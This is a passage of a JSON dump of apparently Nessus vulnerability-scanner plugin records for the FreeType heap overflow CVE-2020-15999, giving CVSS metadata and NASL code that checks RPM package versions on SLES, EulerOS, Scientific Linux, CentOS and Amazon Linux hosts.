Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"freetype2-debugsource-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ft2demos-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libfreetype6-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libfreetype6-32bit-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libfreetype6-debuginfo-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libfreetype6-debuginfo-32bit-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"freetype2-debugsource-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ft2demos-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libfreetype6-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libfreetype6-32bit-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libfreetype6-debuginfo-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libfreetype6-debuginfo-32bit-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"freetype2-debugsource-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ft2demos-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libfreetype6-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libfreetype6-32bit-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libfreetype6-debuginfo-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libfreetype6-debuginfo-32bit-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"freetype2-debugsource-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ft2demos-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libfreetype6-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libfreetype6-32bit-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libfreetype6-debuginfo-2.6.3-7.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libfreetype6-debuginfo-32bit-2.6.3-7.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:42:32", "description": "According to the version of the freetype packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-12-14T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : freetype (EulerOS-SA-2020-2510)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:freetype", "p-cpe:/a:huawei:euleros:freetype-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2510.NASL", "href": "https://www.tenable.com/plugins/nessus/144192", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144192);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"EulerOS 2.0 SP8 : freetype (EulerOS-SA-2020-2510)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the freetype packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior\n to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML\n page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2510\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d16a81fb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"freetype-2.9.1-2.h1.eulerosv2r8\",\n \"freetype-devel-2.9.1-2.h1.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:40:43", "description": "Security Fix(es) :\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-06T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : freetype on SL7.x x86_64 (20201104)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:freetype", "p-cpe:/a:fermilab:scientific_linux:freetype-debuginfo", "p-cpe:/a:fermilab:scientific_linux:freetype-demos", "p-cpe:/a:fermilab:scientific_linux:freetype-devel", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20201104_FREETYPE_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/142556", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142556);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Scientific Linux Security Update : freetype on SL7.x x86_64 (20201104)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security Fix(es) :\n\n - freetype: Heap-based buffer overflow due to integer\n truncation in Load_SBit_Png (CVE-2020-15999)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2011&L=SCIENTIFIC-LINUX-ERRATA&P=712\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b7187c5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:freetype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"freetype-2.8-14.el7_9.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"freetype-debuginfo-2.8-14.el7_9.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"freetype-demos-2.8-14.el7_9.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"freetype-devel-2.8-14.el7_9.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype / freetype-debuginfo / freetype-demos / freetype-devel\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:39:41", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the CESA-2020:4952 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-02-01T00:00:00", "type": "nessus", "title": "CentOS 8 : freetype (CESA-2020:4952)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:freetype", "p-cpe:/a:centos:centos:freetype-devel"], "id": "CENTOS8_RHSA-2020-4952.NASL", "href": "https://www.tenable.com/plugins/nessus/145927", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:4952. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145927);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"RHSA\", value:\"2020:4952\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"CentOS 8 : freetype (CESA-2020:4952)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2020:4952 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4952\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freetype-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:43:56", "description": "The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2020-1565 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : freetype (ALAS-2020-1565)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:freetype", "p-cpe:/a:amazon:linux:freetype-debuginfo", "p-cpe:/a:amazon:linux:freetype-demos", "p-cpe:/a:amazon:linux:freetype-devel", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2020-1565.NASL", "href": "https://www.tenable.com/plugins/nessus/143583", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2020-1565.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143583);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"ALAS\", value:\"2020-1565\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Amazon Linux 2 : freetype (ALAS-2020-1565)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the ALAS2-2020-1565 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2020-1565.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15999\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update freetype' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", 